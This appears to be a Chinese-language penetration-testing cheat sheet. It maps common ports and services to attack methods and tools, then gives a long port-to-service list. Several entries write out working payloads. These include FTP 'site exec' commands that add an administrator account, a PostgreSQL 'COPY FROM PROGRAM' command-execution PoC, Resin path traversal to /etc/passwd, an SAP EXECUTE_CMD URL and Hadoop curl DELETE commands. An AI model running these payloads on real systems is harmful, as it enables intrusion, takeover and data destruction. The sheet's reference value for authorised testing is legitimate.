21
服務
FTP|tftp|vsftpd
攻擊方法
匿名訪問/爆破/嗅探/溢出/后門
工具
(1)爆破:owasp的Bruter/hydra/msf中的ftp爆破模塊
(2)ftp匿名訪問:用戶名:anonymous 密碼:為空或者任意郵箱
(3)嗅探:ftp使用明文傳輸技術(但是嗅探給予局域網並需要欺騙或監聽網關),使用Cain進行滲透
(4)ftp遠程代碼溢出 - MSF
(5)后門:vsftpd :version 2到2.3.4存在后門漏洞,攻擊者可以通過該漏洞獲取root權限
(6)ftp跳轉攻擊
(7)Serv-U權限較大的賬號可導致系統命令執行
(8)FTP提權命令:
# 增加系統用戶 Quote site exec net user 4567 4567 /add
# 提升到管理員權限 Quote site exec net localgroup administrators 4567 /add
22
服務
SSH
攻擊方法
爆破/openssh漏洞/后門
工具
(1)爆破:hydra,msf中的ssh爆破模塊
(2)SSH后門
(3)28退格 OpenSSL
(4)OpenSSH用戶枚舉漏洞(CVE-2018-15473)
23
服務
telnet
攻擊方法
爆破/嗅探
工具:
(1)爆破:hydra/msf中telnet模塊
(2)嗅探:cain - Windows系統中
25
服務 SMTP
攻擊方法 域傳送/劫持/緩存投毒/欺騙/發送釣魚郵件 工具
(1)smtp-user-enum
(2)vefy/expn查詢郵件用戶信息
(3)SMTP服務器配置不當,攻擊者可以使用任意用戶發送郵件
(4)SMTP弱口令掃描,獲取用戶賬號密碼,發送郵件釣魚。
(5)通過SMTP用戶枚舉獲取用戶名: nmap -p 25 -- smtp-enum-users.nse <target>
53
服務
DNS 攻擊方法
DNS溢出/域傳送/劫持/緩存投毒/欺騙以及各種基於dns隧道的遠控/遠程代碼執行/DDOS
工具
(1)DNS溢出 CVE-2017-11779
(2)DNS欺騙 - 常用於內網滲透
(3)DNS域傳送漏洞,Windows下檢測使用nslookup命令,Linux下檢測使用dig命令,通過執行命令可以清楚的看到域名解析情況
(4)DNS緩存投毒是攻擊者欺騙DNS服務器相信偽造的DNS響應的真實性
67/68
服務
dhcp服務
攻擊方法
劫持/欺騙
69
嘗試下載目標及其的各類重要配置文件
80 - 89
服務 IIS/Nginx/Struts 攻擊方法 IIS6 RCE/iismethod/iis6remote/iisshortname/cve-2017-7259 /NginxRange/httpsys/Git/SVN/Struts2
工具
(1)IIS: windows2000的IIS5.0版本->溢出導致遠程代碼執行(X-SCAN可直接探測到IIS漏洞)| ‘Microsoft IISCGI’文件名錯誤解碼漏洞 | 寫權限漏洞 | 嗅探Cain工具
110
服務
POP3
攻擊方法
爆破/嗅探
111
服務
NFS
攻擊方法
權限配置不當
135
服務 RPC協議 | DCOM服務 | WMI
攻擊方法
病毒/弱口令
工具 (1)沖擊波病毒 (1)溢出攻擊導致遠程代碼執行 - ms05011.exe
(2)https://wenku.baidu.com/view/c8b96ae2700abb68a982fbdf.html
137
服務
SMB
139
服務 Samba 攻擊方法 爆破/嗅探/未授權訪問/遠程命令執行
工具
(1)IPC$
(2)ms-017
143
服務
IMAP
攻擊方法
爆破
161
服務 SNMP 攻擊方法 搜集目標內網信息/默認團體名/弱口令訪問
利用方式:通過nmap自帶的審計腳本進行檢測,可能導致敏感信息泄露。
1、弱口令檢測:nmap –sU –p161 –script=snmp-brute <target>
2、獲取系統信息:nmap –sU –p161 –script=snmp-sysdescr <target>
3、獲取用戶信息:nmap -sU -p161 --script=snmp-win32-user <target>
4、獲取網絡端口狀態:nmap -sU -p161 --script=snmp-netstat <target>
389
服務
Ldap目錄訪問協議
攻擊方法
LDAP注入/匿名訪問/弱口令
利用方式:通過LdapBrowser工具直接連入
443
服務 https | Exchange 攻擊方法 poodle/OpenSSLDrown/heartedbleed
安全漏洞:OpenSSL 心臟出血
利用方式:攻擊者可以遠程讀取存在漏洞版本的openssl服務器內存中長大64K的數據
掃描腳本:nmap -sV --script=ssl-heartbleed <target>
445
服務 smb 攻擊方法 ms17-010/ms08-067(windows2003)/MS06-040
464
服務
kpasswd Kerberos 口令和鑰匙改換服務
465
服務
smtps
攻擊方法
同25端口攻擊方法類似
512,513,514
服務
Linux rexec
攻擊方法
爆破/rlogin登陸
554
服務
RTSP
873
服務
rsync
攻擊方法
未授權/文件上傳/匿名訪問/弱口令
客戶端連接
利用方式:攻擊者可以執行下載/上傳等操作,也可以嘗試上傳webshell
1、下載:#rsync -avz a.b.c.d::path/file path/filiname
2、上傳:#rsync -avz path/filename a.b.c.d::path/file

1080
服務
socket
攻擊方法
爆破
1099/1090
服務
RMI
攻擊方法
Java反序列化
工具
attackRMI.jar
1194
服務
OpenVPN
攻擊方法
VPN釣魚
1352
服務
Lotus domino郵件服務
攻擊方法
Lotus 弱口令/信息泄漏/爆破
1433
服務
mssql/SQLServer(tcp-1433、UDP-1434)
攻擊方法 注入/提權/sa弱口令/爆破/嗅探
工具
(1)緩沖區溢出 - nc.exe | sql2.exe
(2)sa弱口令 - supersqlexec.exe
(3)爆破 - hydra
(4)嗅探
(5)差異備份getshell
(6)SA賬戶提權等
1500
ISPmanager 弱口令
1521
服務
Oracle
攻擊方法
tns爆破/注入/反彈shell/數據庫勒索病毒
1723
服務
PPTP
攻擊方法
爆破/VPN釣魚
2049
服務
NFS
攻擊方法
權限配置不當/未授權訪問
工具
rpcinfo -p IP 服務探測
2082,2083
服務
cPanel
攻擊方法
弱口令
2181
服務
Zookeeper
攻擊方法
未授權訪問
檢測方式:攻擊者可通過執行envi命令獲得系統大量的敏感信息,包括系統名稱、Java環境
echo envi | nc ip port
2375
服務
docker
攻擊方法
docker remote api 未授權訪問
檢測方式:通過docker daemon api 執行docker命令。
#列出容器信息,效果與docker ps -a 一致
curl http://<target>:2375/containers/json
docker -H tcp://<target>:2375 start <Container Id>
2601,2604
服務
Zebra
攻擊方法
弱口令/默認密碼zerbra
3000
服務
grafan
3128
服務
Squid
攻擊方法
弱口令
3306
服務
mysql
攻擊方法
爆破/注入
工具
(1)UDF
(2)嗅探 - cain
(3)利用日志寫入webshell、udf提權、mof提權等
3311,3312
服務
kangle
攻擊方法
爆破
3389
服務 rdp | ms-wbt-server 攻擊方法 ms12-020/Windows rdp shift后門[需要03以下的系統]/爆破
工具
(1)輸入法漏洞(windows2000)
(2)嗅探 - cain
(3)后門 - Shift粘滯鍵后門:5次shift
(4)爆破 - hydra
(3)ms12_020 - 藍屏
use auxiliary/scanner/rdp/ms12_020_check #檢測
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids #EXP
3690
svn泄露/未授權訪問
4848
服務
GlassFish控制台
攻擊方法
爆破/認證繞過
4899
服務
radmin
攻擊方法
弱口令
工具
(1)使用webshell注冊表讀取功能可讀取radmini在注冊表的各項鍵值內容,從而破解加密的密碼散列
5000
服務
sybase/DB2/Flask
攻擊方法
爆破/注入/提權
5432
服務 postgresql 攻擊方法 爆破/注入/緩沖區溢出
工具
(1)緩沖區溢出 - CVE-2014-2669
(2)遠程代碼執行 - CVE-2018-1058
(3)攻擊者通過弱口令獲取賬號信息,連入postgres中,可執行系統命令
PoC參考
DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;
5631,5632
服務
pcanywhere
攻擊方法
抓密碼/代碼執行/提權(https://blog.csdn.net/Fly_hps/article/details/80377199)
5900,5901,5902
服務
vnc
攻擊方法
爆破/認證繞過/提權/DDOS
工具
(1)密碼驗證繞過漏洞
(2)嗅探 - cain
(3)VNC的配置信息同樣被寫入注冊表系統中,其中包括連接的密碼和端口。利用webshell的注冊表讀取功能進行讀取加密算法,然后破解
(4)提權 - CVE-2013-6886
(5)DDOS - CVE-2015-5239
5984
服務
couchdb
安全漏洞:垂直權限繞過、任意命令執行利用方式:
通過構造數據創建管理員用戶,使用管理員用戶登錄,構造惡意請求觸發任意命令執行。
后台訪問:http://<target>:5984/_utils
5985
服務
SOAP | WinRM
6379
服務
redis
攻擊方法
未授權訪問/爆破/未授權訪問+配合ssh key提權
利用方式:絕對路徑寫webshell 、利用計划任務執行命令反彈shell、 公私鑰認證獲取root權限、主從復制RCE等
6443
服務
Kubernetes
7001,7002
服務
weblogic/websphere
攻擊方法
WebLogic Java反序列化/爆破/SSRF/管理后台部署 war 后門
7778
Kloxo 主機面板登錄
8000
Ajenti 弱口令
JDWP RCE(工具:https://github.com/IOActive/jdwp-shellifier)
8069
服務
Zabbix
攻擊方法
遠程命令執行/SQL注入
8080 - 8089
服務 jenkins/GeoServer/Kubernetes/JBOSS/Tomcat/Resin/libssh/poodle/Jetty/GlassFish
攻擊方法
爆破/PUT文件上傳/反序列化
工具
(1)Tomcat遠程代碼執行 | 信息泄露 - CVE-2017-12615 | CVE-2017-12616
(2)Tomcat任意文件上傳
(3)Jboss遠程代碼執行
(4)Jboss反序列化漏洞
(5)Resin
任意文件讀取POC:
payload1 = "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"
payload2 = "/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd"
payload3 = "/ ..\\\\web-inf"
(6)Jetty
安全漏洞:
遠程共享緩沖區泄漏利用方式:攻擊者可以通過精心構造headers值來觸發異常並偏移到共享緩沖區,
其中包含了之前其他用戶提交的請求,服務器會根據攻擊者的payload返回特定位置的數據。檢測工具:https://github.com/GDSSecurity/Jetleak-Testing-Script
(7)GlassFish
安全漏洞:
弱口令、任意文件讀取利用方式:
1、弱口令admin/admin,直接部署shell
2、任意文件讀取獲取服務器敏感配置信息
8081
服務
solr/flink
8083,8086
服務
influxDB
攻擊方法
未授權訪問
8161
服務
activemq
利用方法
后台弱口令/寫文件
8180
libssh - cve-2018-10933、JBOSS
8443
服務
Plesk
攻擊方法
弱口令
9000
服務
fastcgi
攻擊方法
遠程命令執行
8440-8450,8080-8089
topn/vpn/owa/webmail/目標oa/各類Java控制台/各類服務器Web管理面板/各類Web中間件漏洞利用/各類Web框架漏洞利用
9200,9300服務
Elasticsearch
攻擊方法
未授權訪問/遠程代碼執行/任意文件讀取
1、直接訪問如下url,獲取相關敏感信息。
http://<target>:9200/_nodes 查看節點數據
http://<target>:9200/_river 查看數據庫敏感信息
2、通過構造特定的數據包,執行任意命令。
11211
服務
memcached
攻擊方法
未授權訪問
27017,27018
服務
mongodb/NoSQL
攻擊方法
未授權訪問/爆破
43958
Serv-U
50000
SAP 安全漏洞:遠程代碼執行 利用方式:攻擊者通過構造url請求,實現遠程代碼執行。 POC:http://<target>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all
50070,50030
hadoop
安全漏洞:未授權訪問利用方式:攻擊者可以通過命令行操作多個目錄下的數據,如進行刪除操作。
curl -i -X DELETE “http://ip:50070/webhdfs/v1/tmp?op=DELETE&recursive=true“
curl -i -X PUT “http://ip:50070/webhdfs/v1/NODATA4U_SECUREYOURSHIT?op=MKDIRS“
61616
ActiveMQ
WebSphere
7001,7002,9080,9081,9090,9043
poodle
9043,9443
solr
8393、8983、8081、80、443、8080
cdn服務器
843,1863
數據庫漏洞

端口|服務
Port Service 7 Echo 11 Systat 13 Daytime 15 Netstat 17 Quote of the day 19 Character generator 21 FTP 22 SSH 23 Telnet 25 SMTP 26 SSH 37 rdate 49 TACACS+ 53 DNS 67 DHCP 69 TFTP, BitTorrent 70 Gopher 79 Finger 80 HTTP, malware 81 HTTP, malware 82 HTTP, malware 83 HTTP 84 HTTP 88 Kerberos 102 Siemens S7 104 DICOM 110 POP3 111 Portmapper 113 identd 119 NNTP 123 NTP 129 Password generator protocol 137 NetBIOS 143 IMAP 161 SNMP 175 IBM Network Job Entry 179 BGP 195 TA14-353a 311 OS X Server Manager 389 LDAP 389 CLDAP 443 HTTPS 443 QUIC 444 TA14-353a, Dell SonicWALL 445 SMB 465 SMTPS 500 IKE (VPN) 502 Modbus 503 Modbus 515 Line Printer Daemon 520 RIP 523 IBM DB2 554 RTSP 587 SMTP mail submission 623 IPMI 626 OS X serialnumbered 636 LDAPS 666 Telnet 771 Realport 789 Redlion Crimson3 873 rsync 902 VMWare authentication 992 Telnet (secure) 993 IMAP with SSL 995 POP3 with SSL 1010 malware 1023 Telnet 1025 Kamstrup 1099 Java RMI 1177 malware 1200 Codesys 1234 udpxy 1400 Sonos 1434 MS-SQL monitor 1515 malware 1521 Oracle TNS 1604 Citrix, malware 1723 PPTP 1741 CiscoWorks 1833 MQTT 1900 UPnP 1911 Niagara Fox 1962 PCworx 1991 malware 2000 iKettle, MikroTik bandwidth test 2081 Smarter Coffee 2082 cPanel 2083 cPanel 2086 WHM 2087 WHM 2123 GTPv1 2152 GTPv1 2181 Apache Zookeeper 2222 SSH, PLC5, EtherNet/IP 2323 Telnet 2332 Sierra wireless (Telnet) 2375 Docker 2376 Docker 2379 etcd 2404 IEC-104 2455 CoDeSys 2480 OrientDB 2628 Dictionary 3000 ntop 3260 iSCSI 3306 MySQL 3310 ClamAV 3386 GTPv1 3388 RDP 3389 RDP 3460 malware 3541 PBX GUI 3542 PBX GUI 3689 DACP 3702 Onvif 3780 Metasploit 3787 Ventrilo 4000 malware 4022 udpxy 4040 Deprecated Chef web interface 4063 ZeroC Glacier2 4064 ZeroC Glacier2 with SSL 4070 HID VertX/ Edge door controller 4157 DarkTrack RAT 4369 EPMD 4443 Symantec Data Center Security 4444 malware 4500 IKE NAT-T (VPN) 4567 Modem web interface 4664 Qasar 4730 Gearman 4782 Qasar 4800 Moxa Nport 4840 OPC UA 4911 Niagara Fox with SSL 4949 Munin 5006 MELSEC-Q 5007 MELSEC-Q 5008 NetMobility 5009 Apple Airport Administration 5060 SIP 5094 HART-IP 5222 XMPP 5269 XMPP Server-to-Server 5353 mDNS 5357 Microsoft-HTTPAPI/2.0 5432 PostgreSQL 5577 Flux LED 5601 Kibana 5632 PCAnywhere 5672 RabbitMQ 5900 VNC 5901 VNC 5938 TeamViewer 5984 CouchDB 6000 X11 6001 X11 6379 Redis 6666 Voldemort database, malware 6667 IRC 6881 BitTorrent DHT 6969 TFTP, BitTorrent 7218 Sierra wireless (Telnet) 7474 Neo4j database 7548 CWMP (HTTPS) 7777 Oracle 7779 Dell Service Tag API 8008 Chromecast 8009 Vizio HTTPS 8010 Intelbras DVR 8060 Roku web interface 8069 OpenERP 8087 Riak 8090 Insteon HUB 8099 Yahoo SmartTV 8112 Deluge (HTTP) 8126 StatsD 8139 Puppet agent 8140 Puppet master 8181 GlassFish Server (HTTPS) 8333 Bitcoin 8334 Bitcoin node dashboard (HTTP) 8443 HTTPS 8554 RTSP 8800 HTTP 8880 Websphere SOAP 8888 HTTP, Andromouse 8889 SmartThings Remote Access 9000 Vizio HTTPS 9001 Tor OR 9002 Tor OR 9009 Julia 9042 Cassandra CQL 9051 Tor Control 9100 Printer Job Language 9151 Tor Control 9160 Apache Cassandra 9191 Sierra wireless (HTTP) 9418 Git 9443 Sierra wireless (HTTPS) 9595 LANDesk Management Agent 9600 OMRON 9633 DarkTrack RAT 9869 OpenNebula 10001 Automated Tank Gauge 10001 Ubiquiti 10243 Microsoft-HTTPAPI/2.0 10554 RTSP 11211 Memcache 12345 malware 17000 Bose SoundTouch 17185 VxWorks WDBRPC 12345 Sierra wireless (Telnet) 11300 Beanstalk 13579 Media player classic web interface 14147 Filezilla FTP 16010 Apache Hbase 16992 Intel AMT 16993 Intel AMT 18245 General Electric SRTP 20000 DNP3 20547 ProconOS 21025 Starbound 21379 Matrikon OPC 23023 Telnet 23424 Serviio 25105 Insteon Hub 25565 Minecraft 27015 Steam A2S server query, Steam RCon 27016 Steam A2S server query 27017 MongoDB 28015 Steam A2S server query 28017 MongoDB (HTTP) 30313 Gardasoft Lighting 30718 Lantronix Setup 32400 Plex 37777 Dahuva DVR 44818 EtherNet/IP 47808 Bacnet 49152 Supermicro (HTTP) 49153 WeMo Link 50070 HDFS Namenode 51106 Deluge (HTTP) 53413 Netis backdoor 54138 Toshiba PoS 55443 McAfee 55553 Metasploit 55554 Metasploit 62078 Apple iDevice 64738 Mumble
hadoop